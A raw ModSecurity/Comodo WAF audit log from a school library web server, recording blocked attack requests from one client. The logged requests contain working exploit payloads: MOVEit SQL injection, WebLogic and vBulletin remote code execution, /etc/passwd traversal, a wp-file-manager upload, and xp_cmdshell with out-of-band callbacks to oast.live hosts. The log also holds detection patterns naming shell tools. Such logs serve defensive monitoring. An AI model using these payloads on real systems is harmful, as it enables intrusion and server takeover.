103.236.140.4 50710 103.236.140.4 8181 --9cacdd44-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdkfntaUQuE0gGpiDiWzgksxqs');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=08jc3ctr85pnsme4iem1s9u2bk X-Varnish: 169021357 --9cacdd44-C-- --9cacdd44-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cacdd44-E-- --9cacdd44-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305068117648 3847 (- - -) Stopwatch2: 1748305068117648 3847; combined=1807, p1=545, p2=1227, p3=0, p4=0, p5=35, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cacdd44-Z-- --916f7265-A-- [27/May/2025:07:30:36 +0700] aDUHrFuSH_Spa4YU2ZmqpgAAAMc 103.236.140.4 50924 103.236.140.4 8181 --916f7265-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168996674 --916f7265-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --916f7265-E-- --916f7265-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305836116922 1512 (- - -) Stopwatch2: 1748305836116922 1512; combined=463, p1=326, p2=109, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916f7265-Z-- --1786f260-A-- [27/May/2025:07:36:15 +0700] aDUI_96cNBpj1JOkpQlMLAAAAEg 103.236.140.4 50968 103.236.140.4 8181 --1786f260-B-- POST /userentry?accountId=/../../../tomcat/webapps/SuEn4/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792044 --1786f260-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --1786f260-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1786f260-E-- --1786f260-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306175100305 4667 (- - -) Stopwatch2: 1748306175100305 4667; combined=2629, p1=526, p2=2069, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1786f260-Z-- --e35fd55f-A-- [27/May/2025:07:45:37 +0700] aDULMd6cNBpj1JOkpQlMMQAAAFM 103.236.140.4 51076 103.236.140.4 8181 --e35fd55f-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0qa44pgpeoi1bmoheagzxps77zprg8ej.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168708150 --e35fd55f-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --e35fd55f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e35fd55f-E-- --e35fd55f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737020303 2390 (- - -) Stopwatch2: 1748306737020303 2390; combined=655, p1=321, p2=305, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35fd55f-Z-- --6f977e7d-A-- [27/May/2025:07:45:37 +0700] aDULMRLFq2VRfSzm6b8PbQAAAI4 103.236.140.4 51068 103.236.140.4 8181 --6f977e7d-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 160587717 --6f977e7d-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --6f977e7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f977e7d-E-- --6f977e7d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737037497 1661 (- - -) Stopwatch2: 1748306737037497 1661; combined=555, p1=348, p2=180, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f977e7d-Z-- --4f5e035e-A-- [27/May/2025:07:45:37 +0700] aDULMd6cNBpj1JOkpQlMMwAAAFE 103.236.140.4 51054 103.236.140.4 8181 --4f5e035e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166166917 --4f5e035e-C-- cH --4f5e035e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f5e035e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748306737037218 3582 (- - -) Stopwatch2: 1748306737037218 3582; combined=2491, p1=562, p2=1855, p3=23, p4=25, p5=25, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f5e035e-Z-- --a6cb9934-A-- [27/May/2025:07:45:37 +0700] aDULMRLFq2VRfSzm6b8PbwAAAI8 103.236.140.4 51104 103.236.140.4 8181 --a6cb9934-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587720 --a6cb9934-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --a6cb9934-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6cb9934-E-- --a6cb9934-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748306737409621 3711 (- - -) Stopwatch2: 1748306737409621 3711; combined=2508, p1=401, p2=2079, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6cb9934-Z-- --ea47c226-A-- [27/May/2025:07:53:13 +0700] aDUM-RLFq2VRfSzm6b8PhgAAAIA 103.236.140.4 51184 103.236.140.4 8181 --ea47c226-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70846122 --ea47c226-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea47c226-E-- --ea47c226-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307193114429 1626 (- - -) Stopwatch2: 1748307193114429 1626; combined=508, p1=361, p2=121, p3=0, p4=0, p5=26, sr=111, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea47c226-Z-- --e5828635-A-- [27/May/2025:08:00:51 +0700] aDUOwxLFq2VRfSzm6b8PmQAAAIs 103.236.140.4 51270 103.236.140.4 8181 --e5828635-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160587777 --e5828635-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5828635-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307651104339 2903 (- - -) Stopwatch2: 1748307651104339 2903; combined=1025, p1=468, p2=523, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5828635-Z-- --895ed643-A-- [27/May/2025:08:02:21 +0700] aDUPHd6cNBpj1JOkpQlMTAAAAEM 103.236.140.4 51316 103.236.140.4 8181 --895ed643-B-- POST /userentry?accountId=/../../../tomcat/webapps/SuEn4/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587807 --895ed643-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --895ed643-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --895ed643-E-- --895ed643-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748307741122204 2905 (- - -) Stopwatch2: 1748307741122204 2905; combined=1524, p1=322, p2=1182, p3=0, p4=0, p5=20, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --895ed643-Z-- --d9090355-A-- [27/May/2025:08:25:01 +0700] aDUUbWTuEZUBy5rh0sZ80AAAAAM 103.236.140.4 51528 103.236.140.4 8181 --d9090355-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166167069 --d9090355-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9090355-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309101328036 2238 (- - -) Stopwatch2: 1748309101328036 2238; combined=737, p1=384, p2=330, p3=0, p4=0, p5=22, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9090355-Z-- --00a4b02d-A-- [27/May/2025:08:25:44 +0700] aDUUmN6cNBpj1JOkpQlMTwAAAE4 103.236.140.4 51556 103.236.140.4 8181 --00a4b02d-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70846134 --00a4b02d-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0q9cd1gpeook7mlf7sganubhfsocwaph.oast.live'-- --00a4b02d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --00a4b02d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748309144101934 4451 (- - -) Stopwatch2: 1748309144101934 4451; combined=2784, p1=556, p2=2134, p3=30, p4=35, p5=29, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 